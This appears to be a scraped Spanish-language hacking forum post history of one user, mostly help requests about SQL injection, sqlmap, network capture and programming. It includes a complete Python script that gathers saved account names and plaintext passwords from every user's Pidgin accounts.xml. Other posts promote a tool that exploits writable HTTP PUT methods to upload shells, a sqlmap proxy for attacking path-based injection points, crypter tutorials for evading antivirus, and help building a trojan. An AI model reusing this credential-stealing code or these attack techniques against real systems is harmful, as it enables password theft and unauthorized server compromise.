Temas

[EDIT: se me olvidaba decir, que al utilizar el NETCAT ( nc -vv 127.0.0.1 3306 ) , captura perfectamente el trafico :/ .]

escribo ya que tengo un problema, me encuentro utilizando backtrack5 r2 y lo que quiero, es realizar unas pruebas capturando el trafico que genera el cliente MYSQL con el servidor MYSQL.

escenario:
a)tengo instalado tanto el cliente como el servidor en la misma maquina(localhost).
b)tengo 2 tarjetas de red conectadas(por otras razones) mas la interfaz loopback.

utilizo ngrep( tambien probe con wireshark ), de la siguiente forma.

ngrep -d lo -W byline port 3306 and host localhost

lo => loopback , tambien e intentado con wlan1 y con wlan2(tengo claro que no deberia pasa nada, solo era de prueba :p ).

y no agarra niun solo paquete, luego probe

ngrep -d lo -W byline host localhost

y tampoco agarra paquetes del protocolo MYSQL, intente con un PING al localhost y captura el trafico del PING perfectamente.

el servidor esta escuchando en el puerto 3306 y el intento de conexion tambn es por ahi, asique no creo que por ahi vaya el problema :/ .

alguien me puede decir que pasa en este caso ?? , al ser localhost, utilizara otro medio que no sea socket para conectarse ?? .

EDIT: se me olvidaba decir, que al utilizar el NETCAT ( nc -vv 127.0.0.1 3306 ) , captura perfectamente el trafico :/ .

saludos.  

[OFF]

hola ... solicito su ayuda para encontrar los texto que ha escrito sagrini, ya que su web y los links de los textos estan OFF , si alguien lo puede resubir, seria genial.

por cierto me intente comunicar con el hace mas o menos 3 o 4 dias y no he recibido ninguna respuesta.

espero su ayuda.

un amigo me envio este libro, espero que les sirva.



http://www.sendspace.com/file/vdl0al


saludos.

hola, recurro a ustedes ya que llevo un par de dias con el siguiente problema...

necesito conectarme a un servidor LDAP, en eso no hay problema, logro conectarme y listar los nombres de los grupos y los datos, pero lo que no logro hacer, es listar los atributos de estos, y es aqui mi problema.

en esta parte del codigo estoy imprimiendo los nombres de los grupos y los datos, que se encuentran en una coleccion, pero aparte quiero imprimir los atributos de los datos, Mail , telefono ,etc....
la idea es imprimir todos los datos del grupo(CN) sin tener que llamar uno por uno( obj.Name , obj.Mail , etc... ) .

o alguna funcion similar a "ldap_first_attribute" que existe en PHP :/ .

Código (vb) [Seleccionar] Expandir


   For Each obj in objMyObject
        response.write obj.Name
        response.write "<br>"
   Next



aqui dejo el codigo completo para que lo revisen  

Código (vb) [Seleccionar] Expandir


<%
dim url_var
url_var    = request.querystring("ruta")
strCuenta = request.querystring("usuario")
strClave   = request.querystring("pasword")
strPath    = url_var
strEmail  = strCuenta & request.querystring("dominio")'"@mi.dominio"
   
Set objNamespaceLDAP = GetObject("LDAP:")

on error resume next
   Set objMyObject = objNamespaceLDAP.OpenDSObject(strPath,strEmail,strClave,1)

if err.number <> 0 then
   response.write "<p>Error al ingresar</p>"
else
   response.write objMyObject.Name
   response.write "<p>Autenticado</p>"
   For Each obj in objMyObject
        response.write obj.Name
        response.write "<br>"
   Next
end if
%>


estoy haciendo un script que se conecte a hotmail utilizando CURL , mi gran problema es que cuando intento inicar sesion, este detecta que no tengo javascript activado, eso es obvio ya que no ejecuto el script desde el navegador.

a alguien se le ocurre una idea??.

saludos.

[*El parametro falso debe coincidir tal cual con el que ponen en sqlmap.]

Despues de haber perdido un par de horas de mi vida, intentando buscar algo parecido al
%IjectHere% de HAVIJ o un ${Inject_Here} como el de ACUNETIX en SQLMAP, primero tome la decision
de editar el codigo, pero me dio demasiada peresa, aparte que con una actualizacion volaba el codigo
asique me decidi mejor en hacer un mini proxy para el SQLMAP, les cuento como funciona.

primero echamos a andar el mini proxy, para esto necesitamos 3 parametros.

[1]PUERTO, de conexion entre el mini proxy y el sqlmap.(puede ser cualquiera :p)
[2]PARAMETRO, este es el parametro falso que modificara sqlmap(abajo explico ).
[3]URL, necesitamos la URL donde se encuentra la sqli, con EL TOKEN que nos indicara
  donde se encuentra el SQLI(Token por defecto "{fuck}").

un ejemplo seria asi ==> python proxySqlmap.py 4345 /cualquier_cosa.php?injectando= http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2{fuck}/archivo.rar

PUERTO de conexion con el proxy => 4345
PARAMETRO falso                         => /cualquier_cosa.php?injectando=
URL  con el token, fijarse en {fuck} => http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2{fuck}/archivo.rar

*El parametro falso debe coincidir tal cual con el que ponen en sqlmap.

donde el parametro identificador2 es el vulnerable(lee mas abajo y entenderas).
con esto dejamos nuestro proxy esperando conexiones en el puerto 4345.

¿como funciona?.
cuando ejecutamos sqlmap, lo hacemos de esta manera "python sqlmap.py -u "http://www.vulnerable.com.ar/carpeta1/ejecuta.php?id=3" -p id" , donde id es nuestra variable vulnerable a sqli, pero nosotros al tener un parametro vulnerable en otro lugar como es en mi caso, es asi "http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2/archivo.rar" , las variables vulnerables son identificador1 e identificador2 , no tenia como shit indicar que esas variables eran vulnerables entonces se me ocurrio hacer lo siguiente, utilizamos nuestro localhost(pueden subirlo a un host si desean ), como si fuese el servidor con la url y apuntamos en sqlmap una variable falsa(cualquier nombre), SIN DARLE UN VALOR por lo menos en esta version no !!xD , en mi caso le pondre "/cualquier_cosa.php?injectando=" , tonces la url nos quedaria de esta manera "http://127.0.0.1/cualquier_cosa.php?injectando=" , ademas debemos agregar el puerto de conexion a nuestro proxy, al ejecutar el sqlmap nos quedaria asi "python sqlmap.py http://127.0.0.1:4345/cualquier_cosa.php?injectando= -p injectando" , esto quiere decir que se conectara a nuestro host(127.0.0.1), y que realizara las peticiones <"GET"> a nuestro host y a la variable "injectando" de la pagina "cualquier_cosa.php", por otro lado tenemos corriendo el proxy haciendo creer que se mejante pagina y variable existe.

Entonces tenemos 2 ventanas de cmd abiertas, una donde corre nuestro proxy y la otra de sqlmap .

espero que a alguien le sirva.

codigo en python ==> http://pastebin.com/NR5sx9u6

una imagen para que vean como reemplaza la injeccion :


PD: por ahi alguien podria mejorar o optimizar el codigo .

EDIT: modifique unas cosillas.

escribo nuevamente ya que tengo un problema, resulta que tengo una injeccion sql en ORACLE, el problema es que la url con el sqli es de esta forma http://www.asdfgf2w.com/asdf1/asdf2/asdf3/archivo.doc , donde asdf3 es el vulnerable a sqli    , el problema es que nose como poner en sqlmap que me tome ese como el parametro vulnerable, alguien sabe ??.

mi primera idea fue realizar un wrapper xD , en otro servidor , con la url tipo http://asdf.com/asdf.php?var1=[SQLI] , pero el servidor es demasiado inestable :/

saludos.

un simple script que obtiene las cuentas guardadas  del cliente de mensajeria PIDGIN.

probado en la version "Pidgin 2.6.6 (libpurple 2.6.6)"

Código (python) [Seleccionar] Expandir

##############################################
## Obtiene las ccuentas guardadas de pidgin ##
## Mail: angelofthedark@live.com.ar         ##
##############################################
import os

#funcion que obtiene las cuentas desde el archivo accounts.xml
def obtenerCuentas( ruta ):
    try:
        h    = open(usu+cuentasXML)
        src  = h.read()
        tmp1 = src.split("<name>")
        tmp2 = src.split("<password>")
        for s in tmp1:
            if "</name>" in s:
                cuentas[0].append(s.split("</name>")[0])
        for t in tmp2:
            if "</password>" in t:
                cuentas[1].append(t.split("</password")[0])
    except:
        print "Error, nose puede continuar !!"
        exit(0)


home       = "/home"
cuentasXML = ".purple/accounts.xml"
archivos   = os.listdir(home)
usuarios   = []
cuentas    = [[],[]] #cuentas[0][0] => mail ; cuentas[0][1] => password

for ar in archivos:
    if os.path.isdir(home+"/"+ar):
        usuarios.append(home+"/"+ar+"/")

for usu in usuarios:
    obtenerCuentas( usu+cuentasXML )


#imprime por pantalla el mail y el password.
cont = 0
for cnt in cuentas[0]:
    print "+++++++++++++++("+str(cont)+")+++++++++++++++"
    print "mail     ==> " + cnt
    print "password ==> " + cuentas[1][cont]
    cont+=1

print "+++++++++++++++(-.FIN.-)+++++++++++++++"


saludos.

holas, tengo una duda con un sql injection, resulta que cuando quiero sacar la cantidad de columnas de una tabla con order by  , me aparece que tengo 5 columnas , pero cuando le aplico el union all select O union select , para unir las consultas , me dice "The used SELECT statements have a different number of columns" , me indica que la cantidad de columnas es distinta, ¿porque sucede eso?.

alguien que me ayude please :B .

les traigo la primera version beta de mi programa, se llama "Crawler Put analizer V0.1" , les explico.

mi programa lo que hace es Detectar en el servidor los metodos PUT , MOVE , DELETE , luego de detectar estos metodos , si es que se encuentran publicos , pasa a la siguiente etapa que es la recopilacion de URLS, detecta las urls del index , luego si activan la opcion de brutear las rutas, el programa comienza a sacar rutas del servidor con un pequeño bruteforce y una lista de palabras, que ustedes pueden configurar como quieran, una vez que se ha detectado todas las rutas posibles,
el programa comienza el intento por subir un archivo .txt al servidor, una vez que haya logrado subir el archivo, comienza el intento por cambiar la extension del archivo para comprobar si se puede ejecutar archivo .asp , .aspx ,.php , etc... , eso es lo que hace.

en resumidas cuentas, busca los metodos PUT,MOVE,DELETE y luego busca una ruta con permisos de escritura, para asi luego intentar subir un archivo( se puede cambiar por una shell xD )

el programa tiene un archivo en la carpeta lib , que se llama config.py , donde se encuentra la configuracion y la explicacion de mi programa.

El archivo que genera es con este contenido.

#var1 ==> datos a escribir en el archivo generado.
#var2 ==> cantidad de caracteres que contiene la cadena.
#var3 ==> extension del archivo.
banner = ( "Generado por 'Crawler Put Analizer'" , "35" , ".txt" )

luego mas abajo encontraran la siguiente configuracion.

esta es la que viene por defecto:

flag_a1 = True #indica si se detiene el programa al no encontrar el metodo PUT.
flag_a2 = False #indica si aparece el mensaje de abandonar el programa, al no encontrarse el metodo DELETE.(No implementa)
flag_2 = True #indica si se obtienen las rutas del Host, desde la ruta indicada ( Ej: /index.asp ).
flag_3 = False #indica si se obtienen rutas por fuerza bruta ( utilizando la lista indicada ).
flag_4 = True #indica si se escriben las rutas.
flag_5 = False #indica si se cambia la extension del archivo, por el configurado.

Link de DEscarga : www.multiupload.com/AKMSUS2L1K

unas capturas :



Esto es lo que conseguiran, si ha tenido exito !! :




cualquier duda , reclamo , consulta, no duden en consultar!!

PD : se muy bien que por ahora contiene bastante errores, prometo en la proxima version(1 semana mas), tratar de arreglar la totalidad de los errores.

escribo porque tengo problemas , e instalado PHP5 + MYSQL + apache2 , y ademas las librerias, despues me he descargado http://www.dvwa.co.uk/ , lo cuelgo en la carpeta /var/www , le he dado permisos 777 , despues he cambiado de grupo y de usuario la carpeta , ademas he configurado el config.inc.php , para que se conecte a mysql , pero cuando pongo en la url 127.0.0.1/setup.php , y luego presiono el boton 'Create/Reset' , me direcciona a una pagina en blanco y no se ejecuta el PHP, resulta que me he dado cuenta que si no utilizo la sentencia or die("") , en algunas funciones, nose ejecuta el codigo, pienso que debe ser algun parametro de la configuracion del apache o de php5 , he buscado y no he encontrado mucho, ¿alguien sabe que es lo que pasa?.


saludos.

PD: utilizo ubuntu , ademas he dado todos los permisos para ver si es esto de los permisos, asique no creo que sea problemas de permisos.

buenas, siguiendo el rfc y el tutorial de mazard, he  escrito el siguiente script   , que deberia servir para conectarse a traves de VIDALIA(TOR para los que conocen por ese nombre(o a cualquier proxy SOCK5)), el problema esta que en el ultimo paso, al enviar los datos, me dice que hay un error de protocolo, y la verdad es que nose donde esta el problema, lo he depurado pero aun asi no entiendo cual es el problema.

lo que puedo decir es que cuando pongo print chr(8) , no me sale el caracter que deberia ser, entonces al parecer ese caracter me corta la cadena, enrealidad nose que podra ser, ojala me puedan echar una mano.

de antemano les doy las gracias.




SOLICIONADO , pueden cerrar nomas.

Hola, escribia para ver si me echan una mano con un script que estoy haciendo, el script lo que hace basicamente es loguearse en una web y descargar todas las paginas que hay en cierto lugar es decir.

tengo la pagina --> www.paginaweb.es

dentro de esa pagina hay un login que piden logicamente, el nombre de usuario y contraseña, hast ahi no hay problema, mi script puede loguearse correctamente a la pagina web.

despues quiero que mi script descargue las paginas que estan en

www.paginaweb.es/paginas?id=XXX

donde XXX es el indice de la pagina.

pero mi problema es que despues de loguearme envio una peticion GET a la pagina
www.paginaweb.es/paginas?id=2 , me dice que el recurso no existe en el servidor, hable con un colega, y me dice que el problema es la cookie, lo que ago yo, es sacar las peticiones http con el "Live http Header", como ven, en cada sesion cambia la cookie logicamente, mi problema esta en que HARCODEO ESA COOKIE , entonces queria saber como sacar la cookie, ya que revisando con el live http header , veo que al abrir la pagina este ya tiene un valor  a la cookie, por lo tanto, nose donde setea la cookie.

eso seria ojala me puedan echar una mano 

[2]

tengo una duda, encontre una pagina donde supuestamente es vulnerable a "blind sql"   , pero tengo una duda por que cuando pongo por ejemplo la variable "id" es la que tiene los indices de las noticias entonces por ejemplo tengo esta pagina

pagina.com/noticias.php?id=2

y yo le pongo

pagina.com/noticias.php?id='


y me da el siguiente error

Código (php) [Seleccionar] Expandir


Warning: sqlanywhere_query() [function.sqlanywhere-query]: SQLAnywhere: [-131] Syntax error near ',',',null,null' on line



Warning: sqlanywhere_fetch_object(): supplied argument is not a valid SQLAnywhere result resource



Warning: sqlanywhere_free_result(): supplied argument is not a valid SQLAnywhere result resource



despues pruebo de esta manera


pagina.com/noticias.php?id=2 and 1=1

y me salen estos errores

Código (php) [Seleccionar] Expandir


Warning: sqlanywhere_query() [function.sqlanywhere-query]: SQLAnywhere: [-131] Syntax error near 'and'



Warning: sqlanywhere_fetch_object(): supplied argument is not a valid SQLAnywhere result resource



[bWarning: sqlanywhere_free_result(): supplied argument is not a valid SQLAnywhere result resource



y segun yo y segun lo que e leido , al poner and 1=1 me deberia salir la pagina completa, pero nose , lo que queria saber, segun los errores , es vulnerable o no la pagina? , si es necesario pongo la pagina, si es que hace falta para saber si es o no vulnerable.



de antemano , les doy la gracia por su tiempo.

Holas aqui les dejo un videotutorial que encontre por la web, es de un tal wyver que enseña a programar un crypter en C , es Scan-Time pero para los que se inician en esto creo que les servira.

Primera parte :
http://www.multiupload.com/HVJW4N25JY

Source de primera parte :
http://www.multiupload.com/KZQQVPRV3E

Segunda parte :
http://www.multiupload.com/9BU2MY52MQ

Source de Primera y segunda  parte Arreglado ( El Enciptador tenia unos fallos  )
http://www.multiupload.com/9KCCR5SRKL

Xao.

hola, tengo un pequeño problema con un codigo que hize.

Código (ASM) [Seleccionar] Expandir



include 'win32ax.inc'

.data
;Datos de Conexion.
puerto dd 123
host   db '127.0.0.1',0

;Variables.
wsa WSADATA     ? ;puntero a una estructura WSADATA.
sock dd     ? ;Handle del socket.
conec hostent     ? ;puntero a la estructura hostent
cliente sockaddr_in ? ;puntero a la estructura sockaddr_in

.code
;Funcion que se ejecuta cuando a habido algun error
proc FIND_ERROR
     ;limpiamos y saltamos al inicio.
     call [WSACleanup]
     ;Limpiamos
     push 2000
     call [Sleep]
     ;Esperamos 2 segundos.
     jmp start
     ;saltamos al inicio del programa.
endp

start :
;Cuerpo del Programa.
push wsa
push 200
call [WSAStartup]
;iniciamos la *.dll con su respectiva Version.
cmp eax,0
jz  siguiente
;Comprobamos que la funcion aya sido ejecutada
;Correctamente
call FIND_ERROR


;de lo contrario, continuamos con nuestro
;programa.
siguiente :

push 6 ;IPPROTO_TCP
push 1 ;SOCK_STREAM
push 2 ;AF_INET
call [socket]
;Creamos un Identificador de Socket.
cmp eax,-1
jnz siguiente2

;si hay un error Llamamos ala funcion
;FIND_ERROR
call FIND_ERROR

siguiente2 :
mov [sock],eax;Guardamos el Handle.
mov eax,0 ;Limpiamos el Registro eax.

push host
call [gethostbyname]

mov [conec],eax  ;guardamos el retorno de la funcion en
;la variable conec.

mov eax,0
push [puerto]
call [htons]

mov [cliente.sin_family],2 ;AF_INET
mov [cliente.sin_port],ax
mov eax,[conec]
mov [cliente.sin_addr],eax

push 20
push cliente
push [sock]
call[connect]

cmp eax,0
jz funciona

call FIND_ERROR

;Cerramos el proceso
push 0
call [ExitProcess]

.end start



el programa no conecta al servidor echo en C, creo que hay un problema con la funcion connect, bueno espero que alguien me pueda ayudar .

SSaludos.

[MASM+radAsm]

Hola Chicos, aqui les traigo un Curso de MASM+radAsm que encontre por la RED esta muy bueno asike decidi traerselos, viene todo para empezar con este lenguaje
desde el compilador hasta la ayuda para las api de windows, mmm.. para instalar el compilador y para configurar viene un PDF con las explicacion pero yo agregue un instalador que encontre por la RED y no necesita configuracion(Creo), en el rar podran encontrar 8 entregas del curso donde viene lo siguiente:

1.Instalacion y configuracion de masm32 + radasm
2.Crear primera aplicacion en masm32, otros
3.Registros del MicroProcesador
4.Condiciones y bucles
5.Nuestra primera ventana
6.Cajas de dialogo
7.Manejo de cadenas, macros
8.Crear una libreria de enlace dinamico DLL. Uso de variables tipo Array

En cada una de ellas encontrar su respectivo tutorial en PDF + Videotutoriales + Los programas Creados.

Espero que les guste.

Descargar: http://www.multiupload.com/LIV9KHNXVE

SSaludos.

holass a todos...
bueno les kuento ... toy kreando un troyano en visual basic 6 sin tener mayor konocimiento en este lenguaje... lo poko que llevo es gracias a un monton de tutoriales que tengo e leido e ido juntando partes (sin kopiar 100% el kodigo)
bueno el problema es la parte fundamental del troyano.... osea la koneccion...
en mi kliente le puse un texbox en el kual pongo un numero de puerto y luego le doy a un boton para que se ponga en escucha del puerto .. pero komo e leido .... no sako nada kon poner un puerto a la eskuxa si no le digo que acepte las konecciones ......
ese es mi problema ... komo ago que el troyano acepte muchas conexiones y ponga el nombre de los konectados en un listview porfavor les agradeceria mucho... ya que e leido mucho y no e enkontrado nada que me konvenza de antemano muchas gracias...

PD: tener en kuenta que en el kliente tengo el winsock y en el servidor agregue un modulo kon el socket master para poder mandar trankilamente ...

PD2: aki les dejo los link del socket master por si alguien los necesita

http://rapidshare.com/files/90513275/CSocketMaster.cls.html
http://rapidshare.com/files/90513517/modSocketMaster.bas.html